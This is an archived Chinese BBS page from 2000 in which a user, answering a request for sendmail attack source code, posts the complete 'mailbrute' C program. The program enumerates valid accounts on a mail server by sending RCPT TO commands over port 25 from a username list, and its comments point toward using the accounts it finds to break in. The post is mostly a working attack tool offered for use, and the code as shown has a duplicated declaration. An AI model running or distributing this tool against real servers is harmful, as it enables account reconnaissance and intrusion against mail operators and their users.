383.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="384.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦！！！), 信区: Security <br>
标  题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>
发信站: BBS 水木清华站 (Sat Aug  5 08:57:38 2000) <br>
  <br>
/* <br>
 *                        mailbrute <br>
 *          By axess ( axess@mail.com ) in Nov-1999 <br>
 * <br>
 *   Damn ugly sendmail bruteforcer for valid accounts. <br>
 *   But it werks and just proves this and i will not make this better. <br>
 * <br>
 *   The story about it is that sendmail take how many rcpt to: <br>
 *   as we want to send and never disconnect the user, that tries more. <br>
 *   Well, why it is like this can any one with any brain figure out =) <br>
 *   But this is also a real good way to bruteforce for valid accounts. heh <br>
 * <br>
 *   Say helo to it. <br>
 *   Just pick an mail from: and then we are ready to brute it. <br>
 *   We wont get disconnected when we just fast send <br>
 *   rcpt to: username from an userlist of lets say 1000 <br>
 *   of the most used usernames you can think of. <br>
 *   Like this.. <br>
 * <br>
 * <br>
 *   550 test... User unknown <br>
 *   rcpt to:test2 <br>
 *   550 test2... User unknown <br>
 *   rcpt to:test3 <br>
 *   550 test3... User unknown <br>
 *   rcpt to:axess <br>
 *   250 axess... Recipient ok <br>
 * <br>
 *   Ohh, then we know that axess is an user on the remote computer. <br>
 * <br>
 *   Usage : ./mailbrute <host> <userlist> <outfile> <br>
 * <br>
 *   Look in the outfile for valid ones. <br>
 * <br>
 *   After you got some accounts.. <br>
 *   Yea well you know what to do. <br>
 * <br>
 *   Solution: <br>
 *   Well , i cant figure out a real good way but this is not easy <br>
 *   and make a maillog that is not of this world so if anyone think <br>
 *   this is a good way to hack . feel free to do it. <br>
 * <br>
 * <br>
 */ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <errno.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <netdb.h> <br>
#include <netinet/in.h> <br>
#include <string.h> <br>
#include <unistd.h> <br>
int main (int argc, char **argv) <br>
{ <br>
  struct sockaddr_in server; <br>
  struct hostent *hp; <br>
  int s; <br>
  char helo[100]; <br>
  char mail[100]; <br>
  char rcpt[100]; <br>
  char gibme[500]; <br>
  char name[1024]; <br>
  FILE *ip; <br>
  FILE *of; <br>
  FILE *of; <br>
if(argc < 4) <br>
    { <br>
     printf("\n\n    mailbrute ( sendmail account bruteforcer ) \n"); <br>
     printf("     By axess ( axess@mail.com ) in Dec-1999    \n"); <br>
     printf("                                             \n"); <br>
     printf("   Usage: %s <host> <userlist> <outfile>\n", argv[0]); <br>
     printf("                                            \n\n"); <br>
     exit(0); <br>
    } <br>
if((hp = gethostbyname (argv[1])) == NULL) { <br>
      printf ("Could not resolve %s.\n", argv[1]); <br>
      exit(1); } <br>
if((ip = fopen(argv[2], "r")) == NULL) { <br>
      printf("Error: input file does not exist\n"); <br>
      exit(1); } <br>
if((of = fopen(argv[3], "w")) == NULL) { <br>
      printf("Error: Cant write to file?\n"); <br>
      exit(1); } <br>
if((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) { <br>
      printf("Error"); <br>
      exit(1); } <br>
  <br>
  <br>
  server.sin_family = AF_INET; <br>
  server.sin_port = htons (25); <br>
  server.sin_addr.s_addr = *(u_long *) hp->h_addr; <br>
  bzero (&(server.sin_zero), 8); <br>
  <br>
if(connect(s, (struct sockaddr *) &server, sizeof (struct sockaddr)) == -1) { <br>
      printf ("Connection refused\n"); <br>
      exit(1); } <br>
  sprintf (helo, "helo mail\r\n"); <br>
  sprintf (mail, "mail from:mailme@hotmail.com\r\n"); <br>
  send (s, helo, strlen (helo), 0); <br>
  send (s, mail, strlen (mail), 0); <br>
   while(fscanf(ip, "%s", name) != EOF) { <br>
  fprintf(of,"Username %s   \n",name); <br>
  <br>
  sprintf (rcpt, "rcpt to:%s\r\n",name); <br>
  send (s, rcpt, strlen (rcpt), 0); <br>
  recv(s,gibme, sizeof(gibme),0); <br>
  <br>
  if((strstr(gibme, "Recipient") != NULL)) { <br>
  fprintf(of,"%s",gibme); <br>
  }  } <br>

  close (s); <br>
  exit(0); <br>
} <br>
  <br>
【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>
: 如题 <br>
  <br>
  <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="384.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>